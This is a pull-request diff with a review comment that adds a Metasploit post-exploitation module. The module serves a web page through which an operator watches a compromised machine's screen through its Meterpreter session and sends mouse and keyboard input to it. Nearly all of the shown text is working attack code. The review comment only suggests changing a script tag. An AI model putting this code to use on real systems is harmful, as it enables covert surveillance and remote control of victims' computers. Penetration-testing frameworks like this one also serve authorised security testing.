modules/post/multi/manage/screenshare.rb

```diff
@@ -0,0 +1,154 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Multi Manage the desktop of the target computer',
+      'Description'   => %q{
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'timwr'],
+      'Platform'      => [ 'linux', 'osx', 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+    ))
+  end
+
+  def run
+    @last_sequence = 0
+    @key_sequence = {}
+    exploit
+  end
+
+  def perform_event(query)
+    action = query['action'].first
+    if action == "key"
+      key = query['key'].first.to_i
+      keyaction = query['keyaction'].first.to_i
+      session.ui.keyevent_send(key, keyaction) if key
+    else
+      x = query['x'].first
+      y = query['y'].first
+      session.ui.mouse(action, x, y)
+    end
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri =~ %r{/screenshot$*}
+      quality = 50
+      data = session.ui.screenshot(quality)
+      send_response(cli, data, {'Content-Type'=>'image/jpeg', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+    elsif request.uri =~ %r{/event$*}
+      query = CGI.parse(request.body)
+      seq = query['i'].first.to_i
+      if seq <= @last_sequence + 1
+        perform_event(query)
+        @last_sequence = seq
+      else
+        @key_sequence[seq] = query
+      end
+      while true
+        event = @key_sequence[@last_sequence + 1]
+        break unless event
+        perform_event(event)
+        @last_sequence = @last_sequence + 1
+        @key_sequence.delete(@last_sequence)
+      end
+
+      send_response(cli, '')
+    else
+      print_status("Sent screenshare html to #{cli.peerhost}")
+      uripath = get_resource
+      uripath += '/' unless uripath.end_with? '/'
+      html = %^<html>
+<head>
+<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
+<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
+<title>Metasploit screenshare</title>
+</head>
+<body onload="updateImage()">
+<noscript>
+<h2><font color="red">Error: You need Javascript enabled to watch the stream.</font></h2>
+</noscript>
+<img onload="updateImage()" onerror="noImage()" id="streamer">
+<br><br>
+<a href="http://www.metasploit.com" target="_blank">www.metasploit.com</a>
+</body>
+<script language="javascript">
```

Comment:
Support for HTML5, XHTML, and HTML4.
 
```suggestion
<script type="text/javascript">
```